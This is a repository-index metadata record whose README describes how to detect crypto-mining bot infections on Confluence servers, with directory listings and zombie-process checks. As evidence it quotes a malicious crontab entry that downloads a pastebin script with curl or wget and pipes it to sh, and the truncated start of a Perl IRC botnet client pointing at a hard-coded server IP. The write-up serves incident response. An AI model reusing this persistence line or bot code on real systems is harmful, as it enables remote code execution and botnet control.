{"id":21700698,"url":"https://github.com/marcocesarato/shell-botkiller","last_synced_at":"2025-06-24T15:32:15.481Z","repository":{"id":65583303,"uuid":"189657160","full_name":"marcocesarato/Shell-BotKiller","owner":"marcocesarato","description":"We'll post findings from an infected confluence-systems we investigated recently, to show how it looks/feel like. the most systems we took a look at were infected with mining-bots like kerberods.","archived":false,"fork":false,"pushed_at":"2019-06-19T07:11:37.000Z","size":32,"stargazers_count":3,"open_issues_count":0,"forks_count":4,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-05-10T20:01:48.197Z","etag":null,"topics":["bot","bots","infected","killerbot","process","server","shell","tutorial","zombies"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/marcocesarato.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-05-31T20:53:21.000Z","updated_at":"2024-08-12T19:49:33.000Z","dependencies_parsed_at":"2023-01-30T15:25:11.044Z","dependency_job_id":null,"html_url":"https://github.com/marcocesarato/Shell-BotKiller","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/marcocesarato/Shell-BotKiller","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/marcocesarato","download_url":"https://codeload.github.com/marcocesarato/Shell-BotKiller/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261703162,"owners_count":23196907,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bot","bots","infected","killerbot","process","server","shell","tutorial","zombies"],"created_at":"2024-11-25T20:16:24.046Z","updated_at":"2025-06-24T15:32:15.453Z","avatar_url":"https://github.com/marcocesarato.png","language":"Shell","readme":"# Shell BotKiller\n\nWe'll post findings from an infected confluence-systems we investigated recently, to show how it looks/feel like. The most systems we took a look at were infected with mining-bots like kerberods.\n\nWith the rise of inexpensive Virtual Servers and popular services that install insecurely by default, coupled with some juicy vulnerabilities (read: RCE - Remote Code Execution), like CVE-2015-5377 and CVE-2015-1427, this year will be an interesting one for Elasticsearch. Elasticsearch provides plenty of targets for people to exploit and create server-based botnets but in fairness it is not only Elasticsearch that suffers from critical vulnerabilities there is also ShellShock, mongodb-exploits and very recently a bug that hit WebSphere, JBoss, Jenkins and OpenNMS.\n\n## Commands for detect infections\n\n1. Check crontab entries `ls -lrth /var/spool/cron/crontabs`\n2. Check temp dir `ls -la /tmp`\n3. Check shm dir `ls -la /dev/shm`\n4. Check your dirs inside opt `ls -la /opt/`\n5. Check zombie processes `ps -ef`\n\n## How prevent it\n\n1. Update your system/softwares\n2. Set right permissions to your user\n\n## Example of Infected Server\n\n### Awkward crontab entries for a user\n```shell\n/var/spool/cron/crontabs # ls -lrth\ntotal 4.0K\n-rw------- 1 root netdev 285 Apr 15 15:34 tmp.Rj8JOI\n-rw-r--r-- 1 root netdev 0 Apr 16 12:42 root\n```\n\n```\n# cat tmp.Rj8JOI \n\n# DO NOT EDIT THIS FILE - edit the master and reinstall.\n# (- installed on Mon Apr 15 17:34:25 2019)\n# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)\n*/10 * * * * (curl -fsSL https://pastebin.com/raw/404NoMore||wget -q -O- https://pastebin.com/raw/404NoMore)|sh\n```\n\n### Files in /tmp that look suspicious\n- See below for the lok_bot\n- At least you get an infection-date\n```shell\n# ls -la /tmp\n\ntotal 1460\ndrwxrwxrwt 1 root root 4096 Apr 29 08:05 .\ndrwxr-xr-x 1 root ro 4096 May 10 2018 ..\n-rw-r--r-- 1 usr1 usr1 0 Apr 27 14:17 .354da7\n-rw-r--r-- 1 usr1 usr1 5 Apr 22 06:23 .XIMunix\ndrwxr-xr-x 2 usr1 usr1 4096 Apr 19 17:45 .dba \u003c-- Bot\ndrwxrwx--- 2 usr1 usr1 4096 Apr 27 21:42 .sysinfo \u003c-- Bot\ndrwxr-xr-x 2 usr1 usr1 4096 Mar 13 08:41 hsperfdata_usr1\ndrwxr-xr-x 2 root root 4096 Oct 7 2016 hsperfdata_root\n-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 ib_cm\n-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 kworker_0:2\n-rwx------ 1 usr1 usr1 473096 Apr 22 18:30 kworker_1:1\n-rw-r--r-- 1 usr1 usr1 0 Apr 19 18:04 lok \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 12 Apr 27 20:33 tmp1 \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 0 Apr 21 18:25 .changgggeerror \u003c--Bot\ndrwxr-xr-x 2 usr1 usr1 4096 Apr 27 15:18 .dba \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 0 Apr 29 06:38 .dbb \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 290 Apr 17 06:57 04dlOCl \u003c-- Bot\n-rwxr-xr-x 1 usr1 usr1 1099016 Apr 29 06:38 jGcLFA1 \u003c-- Bot\ndrwxr-xr-x 2 usr1 usr1 4096 Apr 19 12:47 khugepageds \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 290 Apr 23 00:22 lIFa09m \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 160 Apr 14 11:26 lLNCeDg \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1 290 Apr 15 00:37 lMBH5ME \u003c-- Bot\n\n--- 400 lines deleted ----\n```\n\n\n### Files in /dev/shm that looks suspiciuous\n- See below for the bot\n- At least you get an infection-date\n\n```shell\n# ls -la /dev/shm\n\ntotal 8\ndrwxrwxrwt 2 root root 60 Apr 18 17:53 .\ndrwxr-xr-x 5 root root 340 Oct 10 2018 ..\n-rw-r--r-- 1 daemon daemon 7141 Apr 18 16:33 bt1.txt\n-rwxrwxrwx 1 daemon daemon 621K Mar 18 06:51 1mm6dgJ \u003c-- maybe?\n-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 ec2a6 \u003c-- ???\n-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 de33f4f911f20761 \u003c-- ???\n-rw-r--r-- 1 daemon daemon 290 Apr 14 01:12 L2AJgih \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 160 Apr 14 01:12 77Ink36 \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 290 Apr 14 01:15 H4m361b \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 160 Apr 14 01:15 1Gn6il2 \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 290 Apr 14 01:29 JnImMDp \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 160 Apr 14 01:29 8N128a8 \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 290 Apr 14 01:50 1bI0A61 \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 160 Apr 14 01:50 Jb2jHPC \u003c-- exploit \n-rw-r--r-- 1 daemon daemon 290 Apr 14 02:03 aEEC4K5 \u003c-- exploit \n```\n\n### Zombie processes\n\nTo kill a zombie (process) you have to kill its parent process (just like real zombies!), but the question was how to find it.\n\n- Find the zombie\n\n```shell\n# ps aux | grep 'Z'\n```\n\n- What you get is Zombies and anything else with a Z in it, so you will also get the grep\n\n```\n# ps aux | grep 'Z'\n\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nusr1 13572 0.0 0.0 7628 992 pts/2 S+ 19:40 0:00 grep --color=auto Z\nusr1 93572 0.0 0.0 0 0 ?? Z 19:40 0:00 something\n```\n\n- Find the zombie's parent\n\n```shell\n# pstree -p -s 93572\n\ninit(1)---cnid_metad(1311)---cnid_dbd(5145)\n```\n\nIn this case you do not want to kill that parent process and you should be quite happy with one zombie, but killing the immediate parent process 5145 should get rid of it.\n\n\n#### Example\n\n```shell\n# ps -ef\n\nUID PID PPID C STIME TTY TIME CMD\nusr1 1 0 1 Mar13 ? 12:56:36 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Xms1024m -Xmx8192m -XX:MaxPermSize=512m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2019-03-13_08-41-53.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution -Djava.endorsed.dirs=/opt/atlassian/confluence/endorsed -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start\nusr1 336 1 0 Apr19 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 339 1 0 Apr21 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 354 1 0 Apr19 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 361 1 0 Apr17 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 858 1 0 Apr22 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 903 1 0 Apr21 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 960 1 0 Apr20 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1015 1 0 Apr17 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1072 1 0 Apr20 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1086 1 0 Apr21 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1131 1 0 Apr20 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1274 1 0 Apr20 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1339 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1341 1 0 Apr19 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1350 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1395 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1422 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1434 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1458 1 0 Apr21 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1523 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1559 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1614 1 0 Apr21 ? 00:00:00 [kill] \u003cdefunct\u003e\nusr1 1664 1 0 Apr21 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1726 1 0 Apr20 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1727 1 0 Apr20 ? 00:00:00 [sh] \u003cdefunct\u003e\nusr1 1748 1 0 Apr17 ? 00:00:00 [kill] \u003cdefunct\u003e\n```\n\n## Example of bot\n\n```perl\ncat /dev/shm/bt1.txt\n\n\n#!/usr/bin/perl\nmy $processo =(\"test123\");\n\nmy @titi = (\"index.php?page=\",\"main.php?page=\");\n\nmy $goni = $titi[rand scalar @titi];\n\nmy $linas_max='3';\nmy $sleep='7';\nmy @adms=(\"x\", \"y\", \"z\", \"w\" );\nmy @hostauth=(\"local\");\nmy @canais=(\"#3w\");\nchop (my $nick = `uname`);\nmy $servidor=\"193.56.28.207\";\nmy $ircname =(\"g\");\nmy $realname = (\"g\");\nmy @ircport = (\"80\",\"143\");\nmy $porta = $ircport[rand scalar @ircport];\nmy $VERSAO = '0.5';\n$SIG{'INT'} = 'IGNORE';\n$SIG{'HUP'} = 'IGNORE';\n$SIG{'TERM'} = 'IGNORE';\n$SIG{'CHLD'} = 'IGNORE';\n$SIG{'PS'} = 'IGNORE';\nuse IO::Socket;\nuse Socket;\nuse IO::Select;\nchdir(\"/tmp\");\n$0=\"$processo\".\"\\0\"x16;;\nmy $pid=fork;\nexit if $pid;\ndie \"Problema com o fork: $!\" unless defined($pid);\n\nour %irc_servers;\nour %DCC;\nmy $dcc_sel = new IO::Select-\u003enew();\n\n$sel_cliente = IO::Select-\u003enew();\nsub sendraw {\n if ($#_ == '1') {\n my $socket = $_[0];\n print $socket \"$_[1]\n \n--- others lines deleted ----\n```","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarcocesarato%2Fshell-botkiller","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmarcocesarato%2Fshell-botkiller","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarcocesarato%2Fshell-botkiller/lists"}